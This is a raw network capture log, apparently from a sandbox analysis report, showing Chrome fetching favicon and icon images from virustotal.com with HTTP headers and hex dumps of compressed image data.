                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: 8b b4 ac c6 70 a3 9d f0 77 13 66 ef e8 0f 2b 1c 04 54 54 6c 1f dd b2 3c c3 b5 7b 37 03 83 18 f6 de be ed b0 35 8a b1 93 16 26 8b 1a d5 75 64 8c 9c f4 89 1c 37 89 9b a0 ed 8f 3f 3b 7c ff 17 f5 c4 f8 ec bf bb c3 d7 bf 80 c6 e1 fb f2 ff 66 87 af 7f b9 fb 0e 5f ff 87 1f d1 e1 1b 62 be 83 ef ec 04 ff 33 62 e9 4f 78 f2 4f 1b 4b f3 ae 8f c7 d2 bb 5f 7a 28 96 76 0e f3 e7 66 7d 92 e2 3f dc 77 de 72 95 cf fe b2 eb 38 f7 c7 33 f6 1e f4 ab a6 a7 87 7c d3 7e 61 96 72 5e 29 a0 25 78 1e 1e f3 dd 3f 38 37 af 77 b4 1d 92 fb b9 f4 c9 bc ba fe ca d4 53 9a 44 d1 02 d6 a6 73 a4 37 e3 e0 f0 2d fe 68 69 42 80 aa bd ef f5 00 ee cf 7a ee b8 7f 0e f1 1e 92 d2 7d 0f 8e 3f f4 89 f6 de f3 3c 00 80 a4 7c c4 ba 0e 34 c4 b4 07 04 71 48 03 de 5c ff 4b eb d3 f5 39 44 92 24 6e 04 9f cf 41
                                                                                                                                                                                                                    Data Ascii: pwf+TTl<{75&ud7?;|f_b3bOxOK_z(vf}?wr83|~ar^)%x?87wSDs7-hiBz}?<|4qH\K9D$nA
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: 43 bc 2b b7 11 2f dc 6b 6d 7b 5f 03 50 d5 6c 57 28 f5 32 2e 52 6b f5 c6 f6 05 ef de 5d c8 9b 35 67 72 60 00 ae dd 1a 13 1b 38 92 c4 3a 04 23 43 1c 4f 77 15 9b 83 bc b0 ed e5 fa 25 76 00 ca c5 d3 df 8e 0e 54 f7 93 99 8c 06 62 a6 cd 3f 51 a0 b2 3d d6 61 6a ef fc fa b1 e7 4a 62 d6 36 e1 96 b3 50 86 c3 b7 b7 f7 c2 3f 9a 04 85 e9 78 1c b8 dd fd d2 03 c0 ed 90 f2 de f4 29 d8 60 d0 d3 07 22 8e 5b 7b 16 54 23 9c e8 3b fb 88 6b 45 1c 25 d4 62 cb f0 d6 66 b2 d9 47 56 01 0c ca 40 3a c3 59 99 b4 1e a7 1c 5a 83 9b bc 6d 40 2c 07 b8 eb f7 0f 64 9e 97 e8 c2 a1 bd 4d d1 27 63 a7 ec c1 7d c9 d8 69 9f 8c 95 b1 70 06 6a 7f 3a da d0 d2 c6 ee 8d e5 78 33 30 ce f4 1d ec 49 d7 db 13 36 bb ec d9 c5 20 10 34 d2 19 df 21 82 15 48 b5 84 02 45 1f 15 bd 7b 47 79 86 3c ca 75 b9 e1 2f
                                                                                                                                                                                                                    Data Ascii: C+/km{_PlW(2.Rk]5gr`8:#COw%vTb?Q=ajJb6P?x)`"[{T#;kE%bfGV@:YZm@,dM'c}ipj:x30I6 4!HE{Gy<u/
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1188INData Raw: 1d 31 a2 8c fb 19 f0 b7 3b a4 c7 09 4c 4f 52 70 b3 dc 6e 3a d5 dc be bc f9 a0 33 af a7 8b 69 3b ff c0 ba d2 e3 0f 08 09 3f 38 f9 e0 c3 f3 d5 f4 43 cf 2f 4c 9a 15 b9 5f 17 49 19 56 75 14 85 e9 e4 4d db 34 1f dc 8e df 7f 61 1e 9b a4 09 92 bc 4e 8b 2a 28 4d d4 c4 81 f2 c2 2a 30 26 8c b2 ac 8e 32 53 07 7e 18 36 ba 0b eb c8 d4 89 57 7b 61 1c 14 f2 cc ba f1 54 17 fa 1e 0f 99 a4 59 d2 34 26 f0 cb 28 2a b3 ca 44 5e 11 e4 93 ef 16 8f bd a7 ef 85 5e 36 29 9a 22 f2 b2 34 ae c2 34 f2 13 13 37 9e 1f e8 2e e6 c9 5e 10 54 5e d6 84 49 95 66 4d c1 c5 45 1e a9 2e 8e 92 94 61 e7 81 5f e4 75 9d f3 1a 51 e4 7b 51 5d a9 2e 4e 3d 6f d2 f8 45 16 96 a6 4a eb 24 2e 8d 97 fb a1 9f a9 2e ce bc 74 92 9b 3c a9 eb ca e4 55 62 4c 94 64 89 a9 3c d5 c5 79 ea 4f 72 3f 2a b2 a8 89 92 9c 99
                                                                                                                                                                                                                    Data Ascii: 1;LORpn:3i;?8C/L_IVuM4aN*(M*0&2S~6W{aTY4&(*D^^6)"447.^T^IfME.a_uQ{Q].N=oEJ$..t<UbLd<yOr?*


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    96192.168.2.164984274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC752OUTGET /gui/images/manifest/icon-192x192.png HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC304INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: cb0871e594019dbb9b2bfc5fc26bb430
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 8764
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:49 GMT
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:49 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=60
                                                                                                                                                                                                                    Age: 31
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1104INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 06 00 00 00 52 dc 6c 07 00 00 22 03 49 44 41 54 78 da ed 5d eb 93 1d c5 75 df 9a 8f fa c8 1f a0 8f 77 85 1d 13 13 48 1c b0 63 9b 18 02 d8 ae 04 9c aa c4 09 55 c1 49 91 4d 85 72 19 dd 15 c8 b0 bc 21 2b 21 0c c8 8b 29 05 81 09 e6 21 05 6c 48 04 c6 c1 06 8c 6d 08 60 63 84 c1 98 60 dd bb 2f 69 57 fb 92 b4 ab 7d bf d5 99 9e fb ea e9 e9 e9 3e a7 1f 77 e6 6a 7b aa a6 6e ef dd 99 73 e7 d1 a7 fb 3c 7e e7 d7 6d 6d 6d 6d 41 5b 7c 0b b8 cf 36 c1 31 69 c7 41 b6 c0 e0 bb da f7 81 a2 0d 95 25 3b 0e d2 6e 33 b8 f7 ac e4 a7 3d 47 d9 fb 0d 34 de 57 ab c9 47 3d e0 00 f1 d2 02 83 17 26 bb c9 c0 40 be 89 32 ab 14 33 d0 bc d6 66 c9 6f 93 bc c3 40 f2 bd ee f5 e6 5d be 56 a7 c6 be 4c d3 d1 2e 40 8e 0e 98
                                                                                                                                                                                                                    Data Ascii: PNGIHDRRl"IDATx]uwHcUIMr!+!)!lHm`c`/iW}>wj{ns<~mmmmA[|61iA%;n3=G4WG=&@23fo@]VL.@
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: da 74 21 c1 b2 30 a2 2b 87 2f cf f2 21 9d 4e 85 cb 82 74 e2 2c e4 57 fb e6 26 84 d9 13 40 0b a9 6b 51 9f 2e ec c3 37 4d 8c 60 a6 4e 6c 9a 5e 36 aa ca 4c 2a 6c cc 3e cf f2 75 b2 ba aa e7 9f b1 fc 2e 83 b2 da f4 29 a2 5a cc d2 63 32 02 a9 70 41 90 e8 05 04 23 03 4d 92 e9 82 d5 d2 66 13 5b 60 b8 66 c8 77 e1 58 e7 44 3e ed a3 67 58 2f 55 25 95 6a 1d 63 07 48 67 b4 83 9e eb ca 04 d2 ad 8c ca ab 7c 95 59 89 19 ac 72 2a 7f 2b 90 95 24 80 4c 0f 35 88 f3 d6 66 65 22 5d 27 d4 b0 a1 3b 6c 49 63 de e5 9f ee ed aa 02 40 39 45 41 a3 3f 2d 60 df ab 63 d6 60 5e 0a 34 f6 af 6b 77 ba 9e aa 5b 31 27 80 09 31 63 67 ad ac e4 93 4a 8d f1 66 09 d1 96 b0 22 2c 15 3c 44 2a 95 fe a8 38 ba ac b3 99 14 b3 63 a3 03 a6 89 21 1d 47 32 ef f2 75 4c 4d e8 80 96 23 f9 1d 48 c2 b7 b6 54 96
                                                                                                                                                                                                                    Data Ascii: t!0+/!Nt,W&@kQ.7M`Nl^6L*l>u.)Zc2pA#Mf[`fwXD>gX/U%jcHg|Yr*+$L5fe"]';lIc@9EA?-`c`^4kw[1'1cgJf",<D*8c!G2uLM#HT
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: c6 db 97 ec 1c 24 db 9e 18 25 db 9e dc b8 fb 45 3b 06 95 ca c1 2a 80 e7 05 d2 84 30 b8 04 4b ad 87 ed d1 a9 15 b2 f7 95 13 e4 82 3b 07 04 21 42 ce b1 ac 8e 98 57 ee 19 22 6f f7 2e 90 93 f3 6b 64 7a 61 63 ee d7 ef 1f 13 24 de 38 33 48 90 09 f6 bc 40 1a 68 50 97 b4 28 34 47 70 f8 d8 32 d9 fd 3f c7 c9 67 6f ef e7 ec 64 b1 63 78 f6 0d bd 64 fb fe d1 28 b7 b0 51 a1 d1 37 7f 7f 5c 9a 4d 67 9d 60 cf 0b 94 63 05 a8 e5 08 ca 63 4b 64 e7 81 09 72 fe 2d fd 8c 33 98 92 48 0a f7 73 ba 7a c9 ad 3f 18 27 43 27 56 9a 02 a0 cb 1b 2f 90 48 01 44 09 32 5d f9 ba e8 5d a8 fc a6 85 41 75 23 35 58 76 64 88 f2 c9 94 61 25 54 82 0f 87 16 c9 8d 4f 8f 91 3f be b1 2f 7d 06 60 14 e3 53 37 f5 91 fb 7e 74 8c 4c 4c af 6e a8 7a 00 ba d5 14 a0 3d 2d 5c 0b c8 03 d8 ba 36 1d f9 4e 4b 22 21
                                                                                                                                                                                                                    Data Ascii: $%E;*0K;!BW"o.kdzac$83H@hP(4Gp2?godcxd(Q7\Mg`ccKdr-3Hsz?'C'V/HD2]]Au#5Xvda%TO?/}`S7~tLLnz=-\6NK"!
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC176INData Raw: 20 52 9f 01 8a 3c 23 5c 3c 43 6e 32 48 61 93 63 48 f9 1d 56 22 40 58 13 48 16 b9 d0 e1 15 35 19 2d 30 cb 04 a9 8e 9b 5b 5a 23 4f be 3e 15 d5 07 c4 28 4b 44 bc 3d 61 67 39 b7 ab 8f 74 3d 35 46 3e 1c 5e 8c 8a 71 b0 19 5c 93 08 09 24 21 86 86 43 0b 68 56 6a 26 90 2b 38 b4 4a f1 15 f2 d1 cc 70 81 09 37 a8 8d 9b d5 d1 7e db 89 16 59 c8 71 6a 6e 8d ec 79 e9 04 f9 f4 ad 7c b6 98 c3 ca 57 9d e4 3f bd b9 8f ec 38 30 11 65 8b 69 6d b2 4a 3e b4 f3 ea 5e 3f 26 a2 52 af 08 eb 4c 82 02 59 3f 00 98 94 42 87 b9 55 89 53 80 fc d6 82 43 db
                                                                                                                                                                                                                    Data Ascii: R<#\<Cn2HacHV"@XH5-0[Z#O>(KD=ag9t=5F>^q\$!ChVj&+8Jp7~Yqjny|W?80eimJ>^?&RLY?BUSC
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: c6 fa 40 ce c5 98 6d b5 ff 8d 9d 5c 25 df fa e1 31 72 de cd 7d 49 c6 04 6e 36 a0 ed cf dc d6 1f 41 2c 46 26 57 22 a7 1a 8a 65 81 d8 ef d8 eb 87 cc 08 ac 13 5c 10 f1 0e 71 4c d4 ba f2 75 df 2d c2 ea 30 86 43 5b 29 89 74 b5 2a 0b 94 55 58 d7 21 93 d9 df c3 27 56 c8 1d cf 4e 34 6a 8b 19 22 59 11 a3 32 a5 64 f9 8f 9f 4d 46 d9 62 48 74 c4 56 56 18 12 51 49 7b af c9 92 c8 92 b0 84 54 57 3e 86 03 4a 47 3e 41 2e 91 24 a5 8d 33 81 43 eb 14 38 98 9a 49 d8 02 0a 0c 2e a7 16 1e ed 1b 5b 26 d7 ff e7 58 54 5b cc 92 ef b2 f4 83 ac b3 4c cb 2a 9f 7a eb 64 e8 4b ac 6b d9 f1 aa e4 11 06 57 04 99 25 58 13 a8 1e 09 aa 26 c4 0a 8c 63 0c 5d e1 05 73 0c 34 42 e6 3a 0a 94 9a 08 cb aa 20 06 6a 1f db c4 17 a5 dd 03 2d 8d fc dd 91 45 72 cd 63 23 e4 ac ed 22 ee fe 38 9c 9a 76 96 2f
                                                                                                                                                                                                                    Data Ascii: @m\%1r}In6A,F&W"e\qLu-0C[)t*UX!'VN4j"Y2dMFbHtVVQI{TW>JG>A.$3C8I.[&XT[L*zdKkW%X&c]s4B: j-Erc#"8v/
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: e5 c1 b1 35 40 78 5e 20 cf 0b a4 35 53 b0 bb 98 1e bd cc d9 ca a5 58 e7 a7 ab c5 bc 7f b8 91 e8 c2 e0 8d 3c 2f 90 e7 05 32 36 05 4c 7c 02 d9 02 19 49 f6 b7 52 2c 59 44 4b 1c ff f9 e1 a3 e4 ed de 79 e1 a2 79 58 de 21 13 1c 93 e7 05 f2 bc 40 20 0c 50 da 83 8d 2f 91 54 4e 10 5d d5 13 5e d5 f6 99 db 4a e4 8a 07 86 c8 2f 3e 9a 8b 42 a5 b6 78 87 3c 2f 10 58 86 e7 05 32 09 a9 f2 8b e4 3d 9f 58 24 af cc 95 34 36 22 3f 14 06 f1 95 fb 0e 93 17 df 9b 21 f3 80 f5 00 a0 23 3b 14 92 61 a2 f0 20 13 c8 f3 02 b9 35 87 f2 c4 0b 14 2d 93 fa 7f 73 e4 2f ba d9 05 b3 cb f5 c4 56 81 e3 f9 d9 12 ee 5f dc 35 48 0e fc 7a 3a 9a 35 54 f1 6d 1d de 21 cc f5 7b 5e 20 cf 0b 04 56 08 fe b3 b6 50 f6 c5 3b 6a 9d bf 24 ad 93 6d 8f 96 43 ea 8f b8 7d 66 99 2c 2f 24 12 63 e2 1b 41 e5 7b 5e 20
                                                                                                                                                                                                                    Data Ascii: 5@x^ 5SX</26L|IR,YDKyyX!@ P/TN]^J/>Bx</X2=X$46"?!#;a 5-s/V_5Hz:5Tm!{^ VP;j$mC}f,/$cA{^
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1280INData Raw: 47 7e 41 e8 33 2d 24 5a 87 ff 76 26 21 d1 2c 73 32 8b 1d ca a5 7c f6 fc 62 23 f9 27 ac fd 2d b2 e8 d7 b8 d9 c3 3a c6 a6 51 2d 55 16 db 40 be 11 37 68 cc 14 62 13 61 98 22 0b 59 14 47 75 1e 24 93 99 f6 90 e6 16 2b 2c 0e 7f 75 cf e1 78 21 7b 0c e5 59 16 d4 b8 0a 9c e2 62 52 79 da 8b f2 08 52 5e e5 f3 59 6e 1e ec 96 08 79 0a d6 05 28 70 bf a9 63 d3 db 18 14 01 f2 3b 30 c4 0f 32 ac 74 53 12 61 b6 da 14 e2 f0 f2 07 b3 51 39 23 9b e5 15 47 7d f8 e4 57 29 8e 81 17 2c 0b 94 ec b0 b2 24 5a ce e4 17 cb 89 11 3d 8d ce 91 6f 17 98 73 0b 8c e2 b8 80 ba 58 e2 93 ed d0 ae 00 53 81 e1 6c a6 dc a1 18 70 08 16 88 26 ba de 2c cd 87 4e 6c 83 ab bf d0 59 16 82 ba 0a 7c f2 ab 98 34 33 58 5a f0 b4 ce c5 e3 87 0a ec 3a c0 39 93 9f a8 ed e5 62 fb b1 d5 2c d9 91 9f 25 c4 e5 56 89
                                                                                                                                                                                                                    Data Ascii: G~A3-$Zv&!,s2|b#'-:Q-U@7hba"YGu$+,ux!{YbRyR^Yny(pc;02tSaQ9#G}W),$Z=osXSlp&,NlY|43XZ:9b,%V
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC572INData Raw: bd 45 f9 b4 0f ee 6a b3 b4 a5 01 e3 d2 32 c4 fb 3c 2f 90 e7 05 ca 92 17 88 f6 41 c3 be ae e6 05 92 99 42 e1 3e e5 79 81 3c 2f 50 46 f2 a7 68 1f c4 26 75 b5 a0 10 69 a6 51 4d 09 74 a3 37 9e 17 c8 f3 02 69 ca 4f eb fc 46 0e b0 2a 1f 90 b6 82 0c 58 09 3c 2f 90 e7 05 b2 20 bf d6 f9 03 1b 70 1f 25 2f 10 24 73 4c bd f0 70 9f c2 9a 18 9e 17 28 bb e3 6d 24 aa 32 90 9f d6 f9 b5 92 5f 20 5e 20 85 62 b0 f9 01 3a 13 ec a3 9e b9 ad 17 e6 79 81 3c 2f 10 13 ed d9 67 cb ec 41 f1 02 01 7c 02 1e 33 44 43 a4 8b 90 c4 88 8d d1 c4 f3 02 e9 c9 c7 44 d2 b2 e4 05 a2 39 27 9b a1 4e 34 2f 10 a2 92 8c 8f 10 f5 a8 cc 14 cf 0b e4 79 81 14 01 8a 1e 49 92 2b d0 68 e3 79 81 24 23 be d2 de a2 f8 8c 2a 48 c9 7a fc df 65 7e 01 9a 9c 69 45 f9 ad c0 0b 44 fb 8c 09 b6 c7 6a 35 18 50 11 52 db
                                                                                                                                                                                                                    Data Ascii: Ej2</AB>y</PFh&uiQMt7iOF*X</ p%/$sLp(m$2_ ^ b:y</gA|3DCD9'N4/yI+hy$#*Hze~iEDj5PR


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    97192.168.2.164984374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC499OUTGET /gui/images/favicon.svg HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC338INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 7d8c5bbba14ae22c0218677349f6776d
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:53 GMT
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:53 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=60
                                                                                                                                                                                                                    Age: 27
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC438INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 0f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 82 0d 0a 30 30 30 30 30 30 30 31 0d 0a 30 0d 0a 30 30 30 30 30 30 30 31 0d 0a 14 0d 0a 30 30 30 30 30 30 30 31 0d 0a 85 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 62 35 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000001L0000000100000001;0000000100000001000000010000000010000000100000001w0000b5
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    98192.168.2.164984574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC513OUTGET /gui/images/manifest/icon-192x192.png HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC304INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: e9c7dde793e258547141d6a18abc3b92
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 8764
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:36 GMT
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:36 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=60
                                                                                                                                                                                                                    Age: 44
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC1104INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 06 00 00 00 52 dc 6c 07 00 00 22 03 49 44 41 54 78 da ed 5d eb 93 1d c5 75 df 9a 8f fa c8 1f a0 8f 77 85 1d 13 13 48 1c b0 63 9b 18 02 d8 ae 04 9c aa c4 09 55 c1 49 91 4d 85 72 19 dd 15 c8 b0 bc 21 2b 21 0c c8 8b 29 05 81 09 e6 21 05 6c 48 04 c6 c1 06 8c 6d 08 60 63 84 c1 98 60 dd bb 2f 69 57 fb 92 b4 ab 7d bf d5 99 9e fb ea e9 e9 e9 3e a7 1f 77 e6 6a 7b aa a6 6e ef dd 99 73 e7 d1 a7 fb 3c 7e e7 d7 6d 6d 6d 6d 41 5b 7c 0b b8 cf 36 c1 31 69 c7 41 b6 c0 e0 bb da f7 81 a2 0d 95 25 3b 0e d2 6e 33 b8 f7 ac e4 a7 3d 47 d9 fb 0d 34 de 57 ab c9 47 3d e0 00 f1 d2 02 83 17 26 bb c9 c0 40 be 89 32 ab 14 33 d0 bc d6 66 c9 6f 93 bc c3 40 f2 bd ee f5 e6 5d be 56 a7 c6 be 4c d3 d1 2e 40 8e 0e 98
                                                                                                                                                                                                                    Data Ascii: PNGIHDRRl"IDATx]uwHcUIMr!+!)!lHm`c`/iW}>wj{ns<~mmmmA[|61iA%;n3=G4WG=&@23fo@]VL.@
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC1408INData Raw: da 74 21 c1 b2 30 a2 2b 87 2f cf f2 21 9d 4e 85 cb 82 74 e2 2c e4 57 fb e6 26 84 d9 13 40 0b a9 6b 51 9f 2e ec c3 37 4d 8c 60 a6 4e 6c 9a 5e 36 aa ca 4c 2a 6c cc 3e cf f2 75 b2 ba aa e7 9f b1 fc 2e 83 b2 da f4 29 a2 5a cc d2 63 32 02 a9 70 41 90 e8 05 04 23 03 4d 92 e9 82 d5 d2 66 13 5b 60 b8 66 c8 77 e1 58 e7 44 3e ed a3 67 58 2f 55 25 95 6a 1d 63 07 48 67 b4 83 9e eb ca 04 d2 ad 8c ca ab 7c 95 59 89 19 ac 72 2a 7f 2b 90 95 24 80 4c 0f 35 88 f3 d6 66 65 22 5d 27 d4 b0 a1 3b 6c 49 63 de e5 9f ee ed aa 02 40 39 45 41 a3 3f 2d 60 df ab 63 d6 60 5e 0a 34 f6 af 6b 77 ba 9e aa 5b 31 27 80 09 31 63 67 ad ac e4 93 4a 8d f1 66 09 d1 96 b0 22 2c 15 3c 44 2a 95 fe a8 38 ba ac b3 99 14 b3 63 a3 03 a6 89 21 1d 47 32 ef f2 75 4c 4d e8 80 96 23 f9 1d 48 c2 b7 b6 54 96
                                                                                                                                                                                                                    Data Ascii: t!0+/!Nt,W&@kQ.7M`Nl^6L*l>u.)Zc2pA#Mf[`fwXD>gX/U%jcHg|Yr*+$L5fe"]';lIc@9EA?-`c`^4kw[1'1cgJf",<D*8c!G2uLM#HT
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC1408INData Raw: c6 db 97 ec 1c 24 db 9e 18 25 db 9e dc b8 fb 45 3b 06 95 ca c1 2a 80 e7 05 d2 84 30 b8 04 4b ad 87 ed d1 a9 15 b2 f7 95 13 e4 82 3b 07 04 21 42 ce b1 ac 8e 98 57 ee 19 22 6f f7 2e 90 93 f3 6b 64 7a 61 63 ee d7 ef 1f 13 24 de 38 33 48 90 09 f6 bc 40 1a 68 50 97 b4 28 34 47 70 f8 d8 32 d9 fd 3f c7 c9 67 6f ef e7 ec 64 b1 63 78 f6 0d bd 64 fb fe d1 28 b7 b0 51 a1 d1 37 7f 7f 5c 9a 4d 67 9d 60 cf 0b 94 63 05 a8 e5 08 ca 63 4b 64 e7 81 09 72 fe 2d fd 8c 33 98 92 48 0a f7 73 ba 7a c9 ad 3f 18 27 43 27 56 9a 02 a0 cb 1b 2f 90 48 01 44 09 32 5d f9 ba e8 5d a8 fc a6 85 41 75 23 35 58 76 64 88 f2 c9 94 61 25 54 82 0f 87 16 c9 8d 4f 8f 91 3f be b1 2f 7d 06 60 14 e3 53 37 f5 91 fb 7e 74 8c 4c 4c af 6e a8 7a 00 ba d5 14 a0 3d 2d 5c 0b c8 03 d8 ba 36 1d f9 4e 4b 22 21
                                                                                                                                                                                                                    Data Ascii: $%E;*0K;!BW"o.kdzac$83H@hP(4Gp2?godcxd(Q7\Mg`ccKdr-3Hsz?'C'V/HD2]]Au#5Xvda%TO?/}`S7~tLLnz=-\6NK"!
                                                                                                                                                                                                                    2024-04-25 19:55:21 UTC176INData Raw: 20 52 9f 01 8a 3c 23 5c 3c 43 6e 32 48 61 93 63 48 f9 1d 56 22 40 58 13 48 16 b9 d0 e1 15 35 19 2d 30 cb 04 a9 8e 9b 5b 5a 23 4f be 3e 15 d5 07 c4 28 4b 44 bc 3d 61 67 39 b7 ab 8f 74 3d 35 46 3e 1c 5e 8c 8a 71 b0 19 5c 93 08 09 24 21 86 86 43 0b 68 56 6a 26 90 2b 38 b4 4a f1 15 f2 d1 cc 70 81 09 37 a8 8d 9b d5 d1 7e db 89 16 59 c8 71 6a 6e 8d ec 79 e9 04 f9 f4 ad 7c b6 98 c3 ca 57 9d e4 3f bd b9 8f ec 38 30 11 65 8b 69 6d b2 4a 3e b4 f3 ea 5e 3f 26 a2 52 af 08 eb 4c 82 02 59 3f 00 98 94 42 87 b9 55 89 53 80 fc d6 82 43 db
